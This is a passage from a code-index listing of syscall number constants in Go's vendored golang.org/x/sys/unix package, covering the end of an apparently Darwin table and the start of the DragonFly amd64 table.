SYS_QUOTACTL (line 120) | SYS_QUOTACTL = 165 constant SYS_MOUNT (line 121) | SYS_MOUNT = 167 constant SYS_CSOPS (line 122) | SYS_CSOPS = 169 constant SYS_CSOPS_AUDITTOKEN (line 123) | SYS_CSOPS_AUDITTOKEN = 170 constant SYS_WAITID (line 124) | SYS_WAITID = 173 constant SYS_KDEBUG_TYPEFILTER (line 125) | SYS_KDEBUG_TYPEFILTER = 177 constant SYS_KDEBUG_TRACE_STRING (line 126) | SYS_KDEBUG_TRACE_STRING = 178 constant SYS_KDEBUG_TRACE64 (line 127) | SYS_KDEBUG_TRACE64 = 179 constant SYS_KDEBUG_TRACE (line 128) | SYS_KDEBUG_TRACE = 180 constant SYS_SETGID (line 129) | SYS_SETGID = 181 constant SYS_SETEGID (line 130) | SYS_SETEGID = 182 constant SYS_SETEUID (line 131) | SYS_SETEUID = 183 constant SYS_SIGRETURN (line 132) | SYS_SIGRETURN = 184 constant SYS_THREAD_SELFCOUNTS (line 133) | SYS_THREAD_SELFCOUNTS = 186 constant SYS_FDATASYNC (line 134) | SYS_FDATASYNC = 187 constant SYS_STAT (line 135) | SYS_STAT = 188 constant SYS_FSTAT (line 136) | SYS_FSTAT = 189 constant SYS_LSTAT (line 137) | SYS_LSTAT = 190 constant SYS_PATHCONF (line 138) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 139) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 140) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 141) | SYS_SETRLIMIT = 195 constant SYS_GETDIRENTRIES (line 142) | SYS_GETDIRENTRIES = 196 constant SYS_MMAP (line 143) | SYS_MMAP = 197 constant SYS_LSEEK (line 144) | SYS_LSEEK = 199 constant SYS_TRUNCATE (line 145) | SYS_TRUNCATE = 200 constant SYS_FTRUNCATE (line 146) | SYS_FTRUNCATE = 201 constant SYS_SYSCTL (line 147) | SYS_SYSCTL = 202 constant SYS_MLOCK (line 148) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 149) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 150) | SYS_UNDELETE = 205 constant SYS_OPEN_DPROTECTED_NP (line 151) | SYS_OPEN_DPROTECTED_NP = 216 constant SYS_GETATTRLIST (line 152) | SYS_GETATTRLIST = 220 constant SYS_SETATTRLIST (line 153) | SYS_SETATTRLIST = 221 constant SYS_GETDIRENTRIESATTR (line 154) | SYS_GETDIRENTRIESATTR = 222 constant SYS_EXCHANGEDATA (line 155) | SYS_EXCHANGEDATA = 223 constant SYS_SEARCHFS (line 156) | SYS_SEARCHFS = 225 constant SYS_DELETE (line 157) | SYS_DELETE = 226 constant SYS_COPYFILE (line 158) | SYS_COPYFILE = 227 constant SYS_FGETATTRLIST (line 159) | SYS_FGETATTRLIST = 228 constant SYS_FSETATTRLIST (line 160) | SYS_FSETATTRLIST = 229 constant SYS_POLL (line 161) | SYS_POLL = 230 constant SYS_WATCHEVENT (line 162) | SYS_WATCHEVENT = 231 constant SYS_WAITEVENT (line 163) | SYS_WAITEVENT = 232 constant SYS_MODWATCH (line 164) | SYS_MODWATCH = 233 constant SYS_GETXATTR (line 165) | SYS_GETXATTR = 234 constant SYS_FGETXATTR (line 166) | SYS_FGETXATTR = 235 constant SYS_SETXATTR (line 167) | SYS_SETXATTR = 236 constant SYS_FSETXATTR (line 168) | SYS_FSETXATTR = 237 constant SYS_REMOVEXATTR (line 169) | SYS_REMOVEXATTR = 238 constant SYS_FREMOVEXATTR (line 170) | SYS_FREMOVEXATTR = 239 constant SYS_LISTXATTR (line 171) | SYS_LISTXATTR = 240 constant SYS_FLISTXATTR (line 172) | SYS_FLISTXATTR = 241 constant SYS_FSCTL (line 173) | SYS_FSCTL = 242 constant SYS_INITGROUPS (line 174) | SYS_INITGROUPS = 243 constant SYS_POSIX_SPAWN (line 175) | SYS_POSIX_SPAWN = 244 constant SYS_FFSCTL (line 176) | SYS_FFSCTL = 245 constant SYS_NFSCLNT (line 177) | SYS_NFSCLNT = 247 constant SYS_FHOPEN (line 178) | SYS_FHOPEN = 248 constant SYS_MINHERIT (line 179) | SYS_MINHERIT = 250 constant SYS_SEMSYS (line 180) | SYS_SEMSYS = 251 constant SYS_MSGSYS (line 181) | SYS_MSGSYS = 252 constant SYS_SHMSYS (line 182) | SYS_SHMSYS = 253 constant SYS_SEMCTL (line 183) | SYS_SEMCTL = 254 constant SYS_SEMGET (line 184) | SYS_SEMGET = 255 constant SYS_SEMOP (line 185) | SYS_SEMOP = 256 constant SYS_MSGCTL (line 186) | SYS_MSGCTL = 258 constant SYS_MSGGET (line 187) | SYS_MSGGET = 259 constant SYS_MSGSND (line 188) | SYS_MSGSND = 260 constant SYS_MSGRCV (line 189) | SYS_MSGRCV = 261 constant SYS_SHMAT (line 190) | SYS_SHMAT = 262 constant SYS_SHMCTL (line 191) | SYS_SHMCTL = 263 constant SYS_SHMDT (line 192) | SYS_SHMDT = 264 constant SYS_SHMGET (line 193) | SYS_SHMGET = 265 constant SYS_SHM_OPEN (line 194) | SYS_SHM_OPEN = 266 constant SYS_SHM_UNLINK (line 195) | SYS_SHM_UNLINK = 267 constant SYS_SEM_OPEN (line 196) | SYS_SEM_OPEN = 268 constant SYS_SEM_CLOSE (line 197) | SYS_SEM_CLOSE = 269 constant SYS_SEM_UNLINK (line 198) | SYS_SEM_UNLINK = 270 constant SYS_SEM_WAIT (line 199) | SYS_SEM_WAIT = 271 constant SYS_SEM_TRYWAIT (line 200) | SYS_SEM_TRYWAIT = 272 constant SYS_SEM_POST (line 201) | SYS_SEM_POST = 273 constant SYS_SYSCTLBYNAME (line 202) | SYS_SYSCTLBYNAME = 274 constant SYS_OPEN_EXTENDED (line 203) | SYS_OPEN_EXTENDED = 277 constant SYS_UMASK_EXTENDED (line 204) | SYS_UMASK_EXTENDED = 278 constant SYS_STAT_EXTENDED (line 205) | SYS_STAT_EXTENDED = 279 constant SYS_LSTAT_EXTENDED (line 206) | SYS_LSTAT_EXTENDED = 280 constant SYS_FSTAT_EXTENDED (line 207) | SYS_FSTAT_EXTENDED = 281 constant SYS_CHMOD_EXTENDED (line 208) | SYS_CHMOD_EXTENDED = 282 constant SYS_FCHMOD_EXTENDED (line 209) | SYS_FCHMOD_EXTENDED = 283 constant SYS_ACCESS_EXTENDED (line 210) | SYS_ACCESS_EXTENDED = 284 constant SYS_SETTID (line 211) | SYS_SETTID = 285 constant SYS_GETTID (line 212) | SYS_GETTID = 286 constant SYS_SETSGROUPS (line 213) | SYS_SETSGROUPS = 287 constant SYS_GETSGROUPS (line 214) | SYS_GETSGROUPS = 288 constant SYS_SETWGROUPS (line 215) | SYS_SETWGROUPS = 289 constant SYS_GETWGROUPS (line 216) | SYS_GETWGROUPS = 290 constant SYS_MKFIFO_EXTENDED (line 217) | SYS_MKFIFO_EXTENDED = 291 constant SYS_MKDIR_EXTENDED (line 218) | SYS_MKDIR_EXTENDED = 292 constant SYS_IDENTITYSVC (line 219) | SYS_IDENTITYSVC = 293 constant SYS_SHARED_REGION_CHECK_NP (line 220) | SYS_SHARED_REGION_CHECK_NP = 294 constant SYS_VM_PRESSURE_MONITOR (line 221) | SYS_VM_PRESSURE_MONITOR = 296 constant SYS_PSYNCH_RW_LONGRDLOCK (line 222) | SYS_PSYNCH_RW_LONGRDLOCK = 297 constant SYS_PSYNCH_RW_YIELDWRLOCK (line 223) | SYS_PSYNCH_RW_YIELDWRLOCK = 298 constant SYS_PSYNCH_RW_DOWNGRADE (line 224) | SYS_PSYNCH_RW_DOWNGRADE = 299 constant SYS_PSYNCH_RW_UPGRADE (line 225) | SYS_PSYNCH_RW_UPGRADE = 300 constant SYS_PSYNCH_MUTEXWAIT (line 226) | SYS_PSYNCH_MUTEXWAIT = 301 constant SYS_PSYNCH_MUTEXDROP (line 227) | SYS_PSYNCH_MUTEXDROP = 302 constant SYS_PSYNCH_CVBROAD (line 228) | SYS_PSYNCH_CVBROAD = 303 constant SYS_PSYNCH_CVSIGNAL (line 229) | SYS_PSYNCH_CVSIGNAL = 304 constant SYS_PSYNCH_CVWAIT (line 230) | SYS_PSYNCH_CVWAIT = 305 constant SYS_PSYNCH_RW_RDLOCK (line 231) | SYS_PSYNCH_RW_RDLOCK = 306 constant SYS_PSYNCH_RW_WRLOCK (line 232) | SYS_PSYNCH_RW_WRLOCK = 307 constant SYS_PSYNCH_RW_UNLOCK (line 233) | SYS_PSYNCH_RW_UNLOCK = 308 constant SYS_PSYNCH_RW_UNLOCK2 (line 234) | SYS_PSYNCH_RW_UNLOCK2 = 309 constant SYS_GETSID (line 235) | SYS_GETSID = 310 constant SYS_SETTID_WITH_PID (line 236) | SYS_SETTID_WITH_PID = 311 constant SYS_PSYNCH_CVCLRPREPOST (line 237) | SYS_PSYNCH_CVCLRPREPOST = 312 constant SYS_AIO_FSYNC (line 238) | SYS_AIO_FSYNC = 313 constant SYS_AIO_RETURN (line 239) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 240) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 241) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 242) | SYS_AIO_ERROR = 317 constant SYS_AIO_READ (line 243) | SYS_AIO_READ = 318 constant SYS_AIO_WRITE (line 244) | SYS_AIO_WRITE = 319 constant SYS_LIO_LISTIO (line 245) | SYS_LIO_LISTIO = 320 constant SYS_IOPOLICYSYS (line 246) | SYS_IOPOLICYSYS = 322 constant SYS_PROCESS_POLICY (line 247) | SYS_PROCESS_POLICY = 323 constant SYS_MLOCKALL (line 248) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 249) | SYS_MUNLOCKALL = 325 constant SYS_ISSETUGID (line 250) | SYS_ISSETUGID = 327 constant SYS___PTHREAD_KILL (line 251) | SYS___PTHREAD_KILL = 328 constant SYS___PTHREAD_SIGMASK (line 252) | SYS___PTHREAD_SIGMASK = 329 constant SYS___SIGWAIT (line 253) | SYS___SIGWAIT = 330 constant SYS___DISABLE_THREADSIGNAL (line 254) | SYS___DISABLE_THREADSIGNAL = 331 constant SYS___PTHREAD_MARKCANCEL (line 255) | SYS___PTHREAD_MARKCANCEL = 332 constant SYS___PTHREAD_CANCELED (line 256) | SYS___PTHREAD_CANCELED = 333 constant SYS___SEMWAIT_SIGNAL (line 257) | SYS___SEMWAIT_SIGNAL = 334 constant SYS_PROC_INFO (line 258) | SYS_PROC_INFO = 336 constant SYS_SENDFILE (line 259) | SYS_SENDFILE = 337 constant SYS_STAT64 (line 260) | SYS_STAT64 = 338 constant SYS_FSTAT64 (line 261) | SYS_FSTAT64 = 339 constant SYS_LSTAT64 (line 262) | SYS_LSTAT64 = 340 constant SYS_STAT64_EXTENDED (line 263) | SYS_STAT64_EXTENDED = 341 constant SYS_LSTAT64_EXTENDED (line 264) | SYS_LSTAT64_EXTENDED = 342 constant SYS_FSTAT64_EXTENDED (line 265) | SYS_FSTAT64_EXTENDED = 343 constant SYS_GETDIRENTRIES64 (line 266) | SYS_GETDIRENTRIES64 = 344 constant SYS_STATFS64 (line 267) | SYS_STATFS64 = 345 constant SYS_FSTATFS64 (line 268) | SYS_FSTATFS64 = 346 constant SYS_GETFSSTAT64 (line 269) | SYS_GETFSSTAT64 = 347 constant SYS___PTHREAD_CHDIR (line 270) | SYS___PTHREAD_CHDIR = 348 constant SYS___PTHREAD_FCHDIR (line 271) | SYS___PTHREAD_FCHDIR = 349 constant SYS_AUDIT (line 272) | SYS_AUDIT = 350 constant SYS_AUDITON (line 273) | SYS_AUDITON = 351 constant SYS_GETAUID (line 274) | SYS_GETAUID = 353 constant SYS_SETAUID (line 275) | SYS_SETAUID = 354 constant SYS_GETAUDIT_ADDR (line 276) | SYS_GETAUDIT_ADDR = 357 constant SYS_SETAUDIT_ADDR (line 277) | SYS_SETAUDIT_ADDR = 358 constant SYS_AUDITCTL (line 278) | SYS_AUDITCTL = 359 constant SYS_BSDTHREAD_CREATE (line 279) | SYS_BSDTHREAD_CREATE = 360 constant SYS_BSDTHREAD_TERMINATE (line 280) | SYS_BSDTHREAD_TERMINATE = 361 constant SYS_KQUEUE (line 281) | SYS_KQUEUE = 362 constant SYS_KEVENT (line 282) | SYS_KEVENT = 363 constant SYS_LCHOWN (line 283) | SYS_LCHOWN = 364 constant SYS_BSDTHREAD_REGISTER (line 284) | SYS_BSDTHREAD_REGISTER = 366 constant SYS_WORKQ_OPEN (line 285) | SYS_WORKQ_OPEN = 367 constant SYS_WORKQ_KERNRETURN (line 286) | SYS_WORKQ_KERNRETURN = 368 constant SYS_KEVENT64 (line 287) | SYS_KEVENT64 = 369 constant SYS___OLD_SEMWAIT_SIGNAL (line 288) | SYS___OLD_SEMWAIT_SIGNAL = 370 constant SYS___OLD_SEMWAIT_SIGNAL_NOCANCEL (line 289) | SYS___OLD_SEMWAIT_SIGNAL_NOCANCEL = 371 constant SYS_THREAD_SELFID (line 290) | SYS_THREAD_SELFID = 372 constant SYS_LEDGER (line 291) | SYS_LEDGER = 373 constant SYS_KEVENT_QOS (line 292) | SYS_KEVENT_QOS = 374 constant SYS_KEVENT_ID (line 293) | SYS_KEVENT_ID = 375 constant SYS___MAC_EXECVE (line 294) | SYS___MAC_EXECVE = 380 constant SYS___MAC_SYSCALL (line 295) | SYS___MAC_SYSCALL = 381 constant SYS___MAC_GET_FILE (line 296) | SYS___MAC_GET_FILE = 382 constant SYS___MAC_SET_FILE (line 297) | SYS___MAC_SET_FILE = 383 constant SYS___MAC_GET_LINK (line 298) | SYS___MAC_GET_LINK = 384 constant SYS___MAC_SET_LINK (line 299) | SYS___MAC_SET_LINK = 385 constant SYS___MAC_GET_PROC (line 300) | SYS___MAC_GET_PROC = 386 constant SYS___MAC_SET_PROC (line 301) | SYS___MAC_SET_PROC = 387 constant SYS___MAC_GET_FD (line 302) | SYS___MAC_GET_FD = 388 constant SYS___MAC_SET_FD (line 303) | SYS___MAC_SET_FD = 389 constant SYS___MAC_GET_PID (line 304) | SYS___MAC_GET_PID = 390 constant SYS_PSELECT (line 305) | SYS_PSELECT = 394 constant SYS_PSELECT_NOCANCEL (line 306) | SYS_PSELECT_NOCANCEL = 395 constant SYS_READ_NOCANCEL (line 307) | SYS_READ_NOCANCEL = 396 constant SYS_WRITE_NOCANCEL (line 308) | SYS_WRITE_NOCANCEL = 397 constant SYS_OPEN_NOCANCEL (line 309) | SYS_OPEN_NOCANCEL = 398 constant SYS_CLOSE_NOCANCEL (line 310) | SYS_CLOSE_NOCANCEL = 399 constant SYS_WAIT4_NOCANCEL (line 311) | SYS_WAIT4_NOCANCEL = 400 constant SYS_RECVMSG_NOCANCEL (line 312) | SYS_RECVMSG_NOCANCEL = 401 constant SYS_SENDMSG_NOCANCEL (line 313) | SYS_SENDMSG_NOCANCEL = 402 constant SYS_RECVFROM_NOCANCEL (line 314) | SYS_RECVFROM_NOCANCEL = 403 constant SYS_ACCEPT_NOCANCEL (line 315) | SYS_ACCEPT_NOCANCEL = 404 constant SYS_MSYNC_NOCANCEL (line 316) | SYS_MSYNC_NOCANCEL = 405 constant SYS_FCNTL_NOCANCEL (line 317) | SYS_FCNTL_NOCANCEL = 406 constant SYS_SELECT_NOCANCEL (line 318) | SYS_SELECT_NOCANCEL = 407 constant SYS_FSYNC_NOCANCEL (line 319) | SYS_FSYNC_NOCANCEL = 408 constant SYS_CONNECT_NOCANCEL (line 320) | SYS_CONNECT_NOCANCEL = 409 constant SYS_SIGSUSPEND_NOCANCEL (line 321) | SYS_SIGSUSPEND_NOCANCEL = 410 constant SYS_READV_NOCANCEL (line 322) | SYS_READV_NOCANCEL = 411 constant SYS_WRITEV_NOCANCEL (line 323) | SYS_WRITEV_NOCANCEL = 412 constant SYS_SENDTO_NOCANCEL (line 324) | SYS_SENDTO_NOCANCEL = 413 constant SYS_PREAD_NOCANCEL (line 325) | SYS_PREAD_NOCANCEL = 414 constant SYS_PWRITE_NOCANCEL (line 326) | SYS_PWRITE_NOCANCEL = 415 constant SYS_WAITID_NOCANCEL (line 327) | SYS_WAITID_NOCANCEL = 416 constant SYS_POLL_NOCANCEL (line 328) | SYS_POLL_NOCANCEL = 417 constant SYS_MSGSND_NOCANCEL (line 329) | SYS_MSGSND_NOCANCEL = 418 constant SYS_MSGRCV_NOCANCEL (line 330) | SYS_MSGRCV_NOCANCEL = 419 constant SYS_SEM_WAIT_NOCANCEL (line 331) | SYS_SEM_WAIT_NOCANCEL = 420 constant SYS_AIO_SUSPEND_NOCANCEL (line 332) | SYS_AIO_SUSPEND_NOCANCEL = 421 constant SYS___SIGWAIT_NOCANCEL (line 333) | SYS___SIGWAIT_NOCANCEL = 422 constant SYS___SEMWAIT_SIGNAL_NOCANCEL (line 334) | SYS___SEMWAIT_SIGNAL_NOCANCEL = 423 constant SYS___MAC_MOUNT (line 335) | SYS___MAC_MOUNT = 424 constant SYS___MAC_GET_MOUNT (line 336) | SYS___MAC_GET_MOUNT = 425 constant SYS___MAC_GETFSSTAT (line 337) | SYS___MAC_GETFSSTAT = 426 constant SYS_FSGETPATH (line 338) | SYS_FSGETPATH = 427 constant SYS_AUDIT_SESSION_SELF (line 339) | SYS_AUDIT_SESSION_SELF = 428 constant SYS_AUDIT_SESSION_JOIN (line 340) | SYS_AUDIT_SESSION_JOIN = 429 constant SYS_FILEPORT_MAKEPORT (line 341) | SYS_FILEPORT_MAKEPORT = 430 constant SYS_FILEPORT_MAKEFD (line 342) | SYS_FILEPORT_MAKEFD = 431 constant SYS_AUDIT_SESSION_PORT (line 343) | SYS_AUDIT_SESSION_PORT = 432 constant SYS_PID_SUSPEND (line 344) | SYS_PID_SUSPEND = 433 constant SYS_PID_RESUME (line 345) | SYS_PID_RESUME = 434 constant SYS_PID_HIBERNATE (line 346) | SYS_PID_HIBERNATE = 435 constant SYS_PID_SHUTDOWN_SOCKETS (line 347) | SYS_PID_SHUTDOWN_SOCKETS = 436 constant SYS_SHARED_REGION_MAP_AND_SLIDE_NP (line 348) | SYS_SHARED_REGION_MAP_AND_SLIDE_NP = 438 constant SYS_KAS_INFO (line 349) | SYS_KAS_INFO = 439 constant SYS_MEMORYSTATUS_CONTROL (line 350) | SYS_MEMORYSTATUS_CONTROL = 440 constant SYS_GUARDED_OPEN_NP (line 351) | SYS_GUARDED_OPEN_NP = 441 constant SYS_GUARDED_CLOSE_NP (line 352) | SYS_GUARDED_CLOSE_NP = 442 constant SYS_GUARDED_KQUEUE_NP (line 353) | SYS_GUARDED_KQUEUE_NP = 443 constant SYS_CHANGE_FDGUARD_NP (line 354) | SYS_CHANGE_FDGUARD_NP = 444 constant SYS_USRCTL (line 355) | SYS_USRCTL = 445 constant SYS_PROC_RLIMIT_CONTROL (line 356) | SYS_PROC_RLIMIT_CONTROL = 446 constant SYS_CONNECTX (line 357) | SYS_CONNECTX = 447 constant SYS_DISCONNECTX (line 358) | SYS_DISCONNECTX = 448 constant SYS_PEELOFF (line 359) | SYS_PEELOFF = 449 constant SYS_SOCKET_DELEGATE (line 360) | SYS_SOCKET_DELEGATE = 450 constant SYS_TELEMETRY (line 361) | SYS_TELEMETRY = 451 constant SYS_PROC_UUID_POLICY (line 362) | SYS_PROC_UUID_POLICY = 452 constant SYS_MEMORYSTATUS_GET_LEVEL (line 363) | SYS_MEMORYSTATUS_GET_LEVEL = 453 constant SYS_SYSTEM_OVERRIDE (line 364) | SYS_SYSTEM_OVERRIDE = 454 constant SYS_VFS_PURGE (line 365) | SYS_VFS_PURGE = 455 constant SYS_SFI_CTL (line 366) | SYS_SFI_CTL = 456 constant SYS_SFI_PIDCTL (line 367) | SYS_SFI_PIDCTL = 457 constant SYS_COALITION (line 368) | SYS_COALITION = 458 constant SYS_COALITION_INFO (line 369) | SYS_COALITION_INFO = 459 constant SYS_NECP_MATCH_POLICY (line 370) | SYS_NECP_MATCH_POLICY = 460 constant SYS_GETATTRLISTBULK (line 371) | SYS_GETATTRLISTBULK = 461 constant SYS_CLONEFILEAT (line 372) | SYS_CLONEFILEAT = 462 constant SYS_OPENAT (line 373) | SYS_OPENAT = 463 constant SYS_OPENAT_NOCANCEL (line 374) | SYS_OPENAT_NOCANCEL = 464 constant SYS_RENAMEAT (line 375) | SYS_RENAMEAT = 465 constant SYS_FACCESSAT (line 376) | SYS_FACCESSAT = 466 constant SYS_FCHMODAT (line 377) | SYS_FCHMODAT = 467 constant SYS_FCHOWNAT (line 378) | SYS_FCHOWNAT = 468 constant SYS_FSTATAT (line 379) | SYS_FSTATAT = 469 constant SYS_FSTATAT64 (line 380) | SYS_FSTATAT64 = 470 constant SYS_LINKAT (line 381) | SYS_LINKAT = 471 constant SYS_UNLINKAT (line 382) | SYS_UNLINKAT = 472 constant SYS_READLINKAT (line 383) | SYS_READLINKAT = 473 constant SYS_SYMLINKAT (line 384) | SYS_SYMLINKAT = 474 constant SYS_MKDIRAT (line 385) | SYS_MKDIRAT = 475 constant SYS_GETATTRLISTAT (line 386) | SYS_GETATTRLISTAT = 476 constant SYS_PROC_TRACE_LOG (line 387) | SYS_PROC_TRACE_LOG = 477 constant SYS_BSDTHREAD_CTL (line 388) | SYS_BSDTHREAD_CTL = 478 constant SYS_OPENBYID_NP (line 389) | SYS_OPENBYID_NP = 479 constant SYS_RECVMSG_X (line 390) | SYS_RECVMSG_X = 480 constant SYS_SENDMSG_X (line 391) | SYS_SENDMSG_X = 481 constant SYS_THREAD_SELFUSAGE (line 392) | SYS_THREAD_SELFUSAGE = 482 constant SYS_CSRCTL (line 393) | SYS_CSRCTL = 483 constant SYS_GUARDED_OPEN_DPROTECTED_NP (line 394) | SYS_GUARDED_OPEN_DPROTECTED_NP = 484 constant SYS_GUARDED_WRITE_NP (line 395) | SYS_GUARDED_WRITE_NP = 485 constant SYS_GUARDED_PWRITE_NP (line 396) | SYS_GUARDED_PWRITE_NP = 486 constant SYS_GUARDED_WRITEV_NP (line 397) | SYS_GUARDED_WRITEV_NP = 487 constant SYS_RENAMEATX_NP (line 398) | SYS_RENAMEATX_NP = 488 constant SYS_MREMAP_ENCRYPTED (line 399) | SYS_MREMAP_ENCRYPTED = 489 constant SYS_NETAGENT_TRIGGER (line 400) | SYS_NETAGENT_TRIGGER = 490 constant SYS_STACK_SNAPSHOT_WITH_CONFIG (line 401) | SYS_STACK_SNAPSHOT_WITH_CONFIG = 491 constant SYS_MICROSTACKSHOT (line 402) | SYS_MICROSTACKSHOT = 492 constant SYS_GRAB_PGO_DATA (line 403) | SYS_GRAB_PGO_DATA = 493 constant SYS_PERSONA (line 404) | SYS_PERSONA = 494 constant SYS_WORK_INTERVAL_CTL (line 405) | SYS_WORK_INTERVAL_CTL = 499 constant SYS_GETENTROPY (line 406) | SYS_GETENTROPY = 500 constant SYS_NECP_OPEN (line 407) | SYS_NECP_OPEN = 501 constant SYS_NECP_CLIENT_ACTION (line 408) | SYS_NECP_CLIENT_ACTION = 502 constant SYS___NEXUS_OPEN (line 409) | SYS___NEXUS_OPEN = 503 constant SYS___NEXUS_REGISTER (line 410) | SYS___NEXUS_REGISTER = 504 constant SYS___NEXUS_DEREGISTER (line 411) | SYS___NEXUS_DEREGISTER = 505 constant SYS___NEXUS_CREATE (line 412) | SYS___NEXUS_CREATE = 506 constant SYS___NEXUS_DESTROY (line 413) | SYS___NEXUS_DESTROY = 507 constant SYS___NEXUS_GET_OPT (line 414) | SYS___NEXUS_GET_OPT = 508 constant SYS___NEXUS_SET_OPT (line 415) | SYS___NEXUS_SET_OPT = 509 constant SYS___CHANNEL_OPEN (line 416) | SYS___CHANNEL_OPEN = 510 constant SYS___CHANNEL_GET_INFO (line 417) | SYS___CHANNEL_GET_INFO = 511 constant SYS___CHANNEL_SYNC (line 418) | SYS___CHANNEL_SYNC = 512 constant SYS___CHANNEL_GET_OPT (line 419) | SYS___CHANNEL_GET_OPT = 513 constant SYS___CHANNEL_SET_OPT (line 420) | SYS___CHANNEL_SET_OPT = 514 constant SYS_ULOCK_WAIT (line 421) | SYS_ULOCK_WAIT = 515 constant SYS_ULOCK_WAKE (line 422) | SYS_ULOCK_WAKE = 516 constant SYS_FCLONEFILEAT (line 423) | SYS_FCLONEFILEAT = 517 constant SYS_FS_SNAPSHOT (line 424) | SYS_FS_SNAPSHOT = 518 constant SYS_TERMINATE_WITH_PAYLOAD (line 425) | SYS_TERMINATE_WITH_PAYLOAD = 520 constant SYS_ABORT_WITH_PAYLOAD (line 426) | SYS_ABORT_WITH_PAYLOAD = 521 constant SYS_NECP_SESSION_OPEN (line 427) | SYS_NECP_SESSION_OPEN = 522 constant SYS_NECP_SESSION_ACTION (line 428) | SYS_NECP_SESSION_ACTION = 523 constant SYS_SETATTRLISTAT (line 429) | SYS_SETATTRLISTAT = 524 constant SYS_NET_QOS_GUIDELINE (line 430) | SYS_NET_QOS_GUIDELINE = 525 constant SYS_FMOUNT (line 431) | SYS_FMOUNT = 526 constant SYS_NTP_ADJTIME (line 432) | SYS_NTP_ADJTIME = 527 constant SYS_NTP_GETTIME (line 433) | SYS_NTP_GETTIME = 528 constant SYS_OS_FAULT_WITH_PAYLOAD (line 434) | SYS_OS_FAULT_WITH_PAYLOAD = 529 constant SYS_MAXSYSCALL (line 435) | SYS_MAXSYSCALL = 530 constant SYS_INVALID (line 436) | SYS_INVALID = 63 FILE: vendor/golang.org/x/sys/unix/zsysnum_dragonfly_amd64.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 15) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_MKNOD (line 21) | SYS_MKNOD = 14 constant SYS_CHMOD (line 22) | SYS_CHMOD = 15 constant SYS_CHOWN (line 23) | SYS_CHOWN = 16 constant SYS_OBREAK (line 24) | SYS_OBREAK = 17 constant SYS_GETFSSTAT (line 25) | SYS_GETFSSTAT = 18 constant SYS_GETPID (line 26) | SYS_GETPID = 20 constant SYS_MOUNT (line 27) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 28) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 29) | SYS_SETUID = 23 constant SYS_GETUID (line 30) | SYS_GETUID = 24 constant SYS_GETEUID (line 31) | SYS_GETEUID = 25 constant SYS_PTRACE (line 32) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 33) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 34) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 35) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 36) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 37) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 38) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 39) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 40) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 41) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 42) | SYS_SYNC = 36 constant SYS_KILL (line 43) | SYS_KILL = 37 constant SYS_GETPPID (line 44) | SYS_GETPPID = 39 constant SYS_DUP (line 45) | SYS_DUP = 41 constant SYS_PIPE (line 46) | SYS_PIPE = 42 constant SYS_GETEGID (line 47) | SYS_GETEGID = 43 constant SYS_PROFIL (line 48) | SYS_PROFIL = 44 constant SYS_KTRACE (line 49) | SYS_KTRACE = 45 constant SYS_GETGID (line 50) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 51) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 52) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 53) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 54) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 55) | SYS_IOCTL = 54 constant SYS_REBOOT (line 56) | SYS_REBOOT = 55 constant SYS_REVOKE (line 57) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 58) | SYS_SYMLINK = 57 constant SYS_READLINK (line 59) | SYS_READLINK = 58 constant SYS_EXECVE (line 60) | SYS_EXECVE = 59 constant SYS_UMASK (line 61) | SYS_UMASK = 60 constant SYS_CHROOT (line 62) | SYS_CHROOT = 61 constant SYS_MSYNC (line 63) | SYS_MSYNC = 65 constant SYS_VFORK (line 64) | SYS_VFORK = 66 constant SYS_SBRK (line 65) | SYS_SBRK = 69 constant SYS_SSTK (line 66) | SYS_SSTK = 70 constant SYS_MUNMAP (line 67) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 68) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 69) | SYS_MADVISE = 75 constant SYS_MINCORE (line 70) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 71) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 72) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 73) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 74) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 75) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 76) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 77) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 78) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 79) | SYS_DUP2 = 90 constant SYS_FCNTL (line 80) | SYS_FCNTL = 92 constant SYS_SELECT (line 81) | SYS_SELECT = 93 